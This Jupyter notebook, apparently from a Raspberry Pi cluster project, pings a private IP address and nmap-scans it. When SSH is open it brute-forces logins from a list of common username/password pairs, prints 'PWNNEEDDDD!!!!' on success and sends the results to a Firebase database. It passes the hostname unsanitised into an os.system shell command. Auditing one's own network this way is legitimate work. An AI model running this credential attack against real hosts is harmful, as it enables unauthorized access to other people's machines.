# Singular Demonstration

Single hostname vulnerability test.

This is the same code that is being run on the nodes in the Raspberry Pi Cluster (see `ClusterDemo.ipynb`).

### Load Dataset for Common Username/Passwords

In [1]:
import csv
import numpy as np
uid_list=[]
pwd_list=[]
with open('data/Dataset.csv', encoding='utf-8-sig') as f:
      reader = csv.reader(f)
      for row in reader:
        uid_list.append(row[0])
        pwd_list.append(row[1])

### Hostname to test:

In [2]:
hostname = "172.22.0.166"

#### Test if hostname is reachable:

In [3]:
import os
if (os.system("ping -c 1 -w 1 " + hostname)) == 0:    valid = "alive"

#### Run nmap

In [4]:
    from libnmap.process import NmapProcess
    from libnmap.parser import NmapParser
    nmproc = NmapProcess(hostname, "-sV")
    rc = nmproc.run()
    parsed = NmapParser.parse(nmproc.stdout)
    host = parsed.hosts[0]
    print(host)

NmapHost: [172.22.0.166 () - up]


#### From nmap data, scan for open ports and begin testing

In [5]:
    services = []
    status = "Unknown"
    cracked = False
    for serv in host.services:
        services.append(str(serv.port) + "/" + str(serv.service))
        if serv.port == 22:
            import paramiko
            client = paramiko.client.SSHClient()
            client.load_system_host_keys()
            client.set_missing_host_key_policy(paramiko.WarningPolicy)
            for uid in uid_list:
                for pwd in pwd_list:
                    try:
                        if cracked == False:
                            client.connect(hostname,username=uid,password=pwd)
                            stdin, stdout, stderr = client.exec_command('ls -l')
                            status = "Poor SSH Credentials"
                            print("PWNNEEDDDD!!!!")
                            cracked = True
                    except:
                        print("failed to pwn")
                        status = "Unknown"
            client.close()

/home/pi/.local/lib/python3.5/site-packages/paramiko/client.py:779: UserWarning: Unknown ssh-ed25519 host key for 172.22.0.166: b'24dcec1cd86f3783704c08c61b942df6'
  key.get_name(), hostname, hexlify(key.get_fingerprint()),


PWNNEEDDDD!!!!


#### Upload data to real-time database

In [6]:
    import pyrebase
    config = {
        "apiKey": "",
        "authDomain": "clusterscanner.firebaseio.com",
        "databaseURL": "https://clusterscanner.firebaseio.com/",
        "storageBucket": "clusterscanner.appspot.com"
    }
    firebase = pyrebase.initialize_app(config)
    auth = firebase.auth()
    user = auth.sign_in_with_email_and_password("pi@cluster.pi", "")
    db = firebase.database()  # reference to the database service
    hoststruct = hostname.split(".")
    data = {"hostname": hostname,
            "services": services,
            "status": status}
    results = db.child(hoststruct[0]).child(hoststruct[1]).child(
        hoststruct[2]).child(hoststruct[3]).set(data, user['idToken'])

In [7]:
print(hostname+" is "+valid)

172.22.0.166 is alive
